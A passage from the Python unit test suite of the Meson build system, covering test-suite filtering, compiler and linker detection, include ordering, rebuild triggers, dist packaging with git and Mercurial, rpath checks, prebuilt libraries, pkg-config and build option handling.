self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somfxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# target private dir
someexe_id = Target.construct_id_from_path("sub4", "someexe", "@exe")
self.assertPathEqual(incs[0], "-I" + os.path.join("sub4", someexe_id))
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
self.assertPathEqual(incs[0], '-Isomefxe@exe')
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <[email protected]>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
